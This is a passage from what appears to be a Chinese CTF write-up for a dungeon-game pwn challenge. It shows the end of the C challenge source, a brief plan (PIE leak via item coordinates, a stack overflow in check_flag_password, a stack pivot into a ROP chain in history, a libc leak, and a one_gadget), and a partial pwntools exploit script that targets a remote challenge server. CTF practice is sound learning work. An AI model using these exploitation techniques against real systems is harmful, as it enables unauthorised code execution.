class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="s">&#34;look&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">look_around</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="s">&#34;inv&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">print_inventory</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="s">&#34;grab&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">grab_item</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="s">&#34;help&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">print_help</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="s">&#34;quit&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; You flee the dungeon in fear...&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; Perhaps another day, brave adventurer.&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nf">strlen</span><span class="p">(</span><span class="n">input</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; Unknown command. Type &#39;help&#39; for options.&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">move_count</span> <span class="o">%</span> <span class="mi">25</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">move_count</span> <span class="o">&lt;</span> <span class="n">MAX_MOVES</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34; [%d moves remaining...]</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">MAX_MOVES</span> <span class="o">-</span> <span class="n">move_count</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">move_count</span> <span class="o">&gt;=</span> <span class="n">MAX_MOVES</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ════════════════════════════════════&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; The dungeon&#39;s magic forces you out!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; You have exhausted your journey...&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34; ════════════════════════════════════&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>棋盘游戏,发现 main 的地址通过棋盘上 item 的坐标信息给出,可以泄露 PIE</p> <p>check_flag_password 有栈溢出,溢出 0x10 字节</p> <p>history 里面可以布置 ropchain 从而达成栈迁移</p> <h3 id="攻击思路-3">攻击思路 </h3><p>leak pie 之后在 history 上布置 ropchain ,通过 check_flag_password 的栈溢出把栈迁移到 history 上跑 ropchain 去 leak libc 顺便 reread</p> <p>然后 reread 的时候写入 onegadget 就行了</p> <h3 id="exp-3">exp </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span><span class="lnt">147 </span><span class="lnt">148 </span><span class="lnt">149 </span><span class="lnt">150 </span><span class="lnt">151 </span><span class="lnt">152 </span><span class="lnt">153 </span><span class="lnt">154 </span><span class="lnt">155 </span><span class="lnt">156 </span><span class="lnt">157 </span><span class="lnt">158 </span><span class="lnt">159 </span><span class="lnt">160 </span><span class="lnt">161 </span><span class="lnt">162 </span><span class="lnt">163 </span><span class="lnt">164 </span><span class="lnt">165 </span><span class="lnt">166 </span><span class="lnt">167 </span><span class="lnt">168 </span><span class="lnt">169 </span><span class="lnt">170 </span><span class="lnt">171 </span><span class="lnt">172 </span><span class="lnt">173 </span><span class="lnt">174 </span><span class="lnt">175 </span><span class="lnt">176 </span><span class="lnt">177 </span><span class="lnt">178 </span><span class="lnt">179 </span><span class="lnt">180 </span><span class="lnt">181 </span><span class="lnt">182 </span><span class="lnt">183 </span><span class="lnt">184 </span><span class="lnt">185 </span><span class="lnt">186 </span><span class="lnt">187 </span><span class="lnt">188 </span><span class="lnt">189 </span><span class="lnt">190 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">os</span> <span class="o">=</span> <span class="s1">&#39;linux&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">file</span> <span class="o">=</span> <span class="s1">&#39;./chall_patched&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;./libc.so.6&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">libcoffsetdict</span> <span class="o">=</span> <span class="p">{}</span> </span></span><span class="line"><span class="cl"><span class="n">libcrealdict</span> <span class="o">=</span> <span class="p">{}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">libcdict_add</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">addr</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">addr</span> <span class="o">&gt;</span> <span class="mh">0x1000000</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">libcrealdict</span><span class="p">[</span><span class="n">name</span><span class="p">]</span> <span class="o">=</span> <span class="n">addr</span> </span></span><span class="line"><span class="cl"> <span class="n">addr</span> <span class="o">%=</span> <span class="mh">0x1000</span> </span></span><span class="line"><span class="cl"> <span class="n">libcoffsetdict</span><span class="p">[</span><span class="n">name</span><span class="p">]</span> <span class="o">=</span> <span class="n">addr</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">getlibc</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">libc</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="ow">not</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">libcdb</span><span class="o">.</span><span class="n">search_by_symbol_offsets</span><span class="p">(</span><span class="n">libcoffsetdict</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">initlibc</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="ow">not</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span><span class="s1">&#39;cp&#39;</span><span class="p">,</span> <span class="n">libc</span><span class="o">.</span><span class="n">path</span><span class="p">,</span> <span class="s1">&#39;./libc.so.6&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> <span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span><span class="s1">&#39;pwninit&#39;</span><span class="p">,</span> <span class="s1">&#39;--no-template&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">target</span> <span class="o">=</span> <span class="s1">&#39;60.205.163.215&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">port</span> <span class="o">=</span> <span class="mi">13774</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span> <span class="o">=</span> <span class="n">p</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">dbg</span><span class="p">(</span><span class="n">cmd</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">gdbscript</span> <span class="o">=</span> <span class="n">cmd</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">peek</span><span class="p">(</span><span class="n">num</span><span class="o">=</span><span class="mi">4096</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">message</span> <span class="o">=</span> <span class="n">p</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span><span class="o">.</span><span class="n">unrecv</span><span class="p">(</span><span class="n">message</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">message</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">s</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sa</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">,</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sla</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">,</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">num</span><span class="o">=</span><span class="mi">4096</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">ur</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">unrecv</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">pk</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">num</span><span class="o">=</span><span class="mi">4096</span> <span class="p">:</span><span class="n">peek</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">rl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">num</span><span class="o">=</span><span class="mi">4096</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recvline</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">ru</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">itr</span> <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">uu32</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">u32</span><span class="p">(</span><span class="n">data</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">uu64</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">u64</span><span class="p">(</span><span class="n">data</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">uru64</span> <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span><span class="n">uu64</span><span class="p">(</span><span class="n">ru</span><span class="p">(</span><span class="s1">&#39;</span><span class="se">\x7f</span><span class="s1">&#39;</span><span class="p">)[</span><span class="o">-</span><span class="mi">6</span><span class="p">:])</span> </span></span><span class="line"><span class="cl"><span class="n">leak</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">name</span> <span class="p">:</span><span class="n">log</span><span class="o">.</span><span class="n">success</span><span class="p">(</span><span class="s1">&#39;</span><span class="si">{}</span><span class="s1"> = </span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="nb">hex</span><span class="p">(</span><span class="nb">eval</span><span class="p">(</span><span class="n">name</span><span class="p">))))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">item</span> <span class="o">=</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="sa">b</span><span class="s1">&#39;Sword&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="sa">b</span><span class="s1">&#39;Shield&#39;</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="sa">b</span><span class="s1">&#39;Potion&#39;</span><span class="p">:</span> <span class="mi">2</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="sa">b</span><span class="s1">&#39;Key&#39;</span><span class="p">:</span> <span class="mi">3</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="sa">b</span><span class="s1">&#39;Scroll&#39;</span><span class="p">:</span> <span class="mi">4</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="sa">b</span><span class="s1">&#39;Amulet&#39;</span><span class="p">:</span> <span class="mi">5</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="sa">b</span><span class="s1">&#39;Crown&#39;</span><span class="p">:</span> <span class="mi">6</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="sa">b</span><span class="s1">&#39;Flag&#39;</span><span class="p">:</span> <span class="mi">7</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">nowx</span><span class="p">,</span> <span class="n">nowy</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"><span class="n">main_leak</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"><span class="n">pie_leak</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">move</span><span class="p">(</span><span class="n">way</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">nowx</span><span class="p">,</span> <span class="n">nowy</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">way</span> <span class="o">==</span> <span class="sa">b</span><span class="s1">&#39;e&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">nowx</span> <span class="o">+=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> <span class="k">elif</span> <span class="n">way</span> <span class="o">==</span> <span class="sa">b</span><span class="s1">&#39;w&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">nowx</span> <span class="o">-=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> <span class="k">elif</span> <span class="n">way</span> <span class="o">==</span> <span class="sa">b</span><span class="s1">&#39;s&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">nowy</span> <span class="o">+=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> <span class="k">elif</span> <span class="n">way</span> <span class="o">==</span> <span class="sa">b</span><span class="s1">&#39;n&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">nowy</span> <span class="o">-=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; &#39;</span><span class="p">,</span> <span class="n">way</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">move_check</span><span class="p">(</span><span class="n">way</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">main_leak</span> </span></span><span class="line"><span class="cl"> <span class="n">gotit</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl"> <span class="n">move</span><span class="p">(</span><span class="n">way</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">rl</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">pk</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">!=</span> <span class="sa">b</span><span class="s1">&#39;&gt;&#39;</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">r</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="sa">b</span><span class="s1">&#39;[&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> </span></span><span class="line"><span class="cl"> <span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;spot a &#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">gotit</span> <span class="o">=</span> <span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39; &#39;</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">item</span><span class="p">[</span><span class="n">gotit</span><span class="p">]</span> <span class="o">&lt;=</span> <span class="mi">5</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">main_leak</span> <span class="o">|=</span> <span class="p">(</span><span class="n">nowx</span> <span class="o">&lt;&lt;</span> <span class="mi">4</span> <span class="o">|</span> <span class="n">nowy</span><span class="p">)</span> <span class="o">&lt;&lt;</span> <span class="p">(</span><span class="mi">8</span> <span class="o">*</span> <span class="n">item</span><span class="p">[</span><span class="n">gotit</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">grab</span><span class="p">(</span><span class="n">pwd</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;grab&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Password: &#39;</span><span class="p">,</span> <span class="n">pwd</span><span class="p">[:</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">write</span><span class="p">(</span><span class="n">data</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="n">data</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; &#39;</span><span class="p">,</span> <span class="n">data</span><span class="p">[:</span><span class="mi">6</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> <span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mh">0x8</span><span class="p">:]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">attack</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">pie_leak</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0x8</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0x10</span> <span class="o">-</span> <span class="mi">1</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">move_check</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;e&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">move_check</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;s&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0x10</span> <span class="o">-</span> <span class="mi">1</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">move_check</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;w&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span 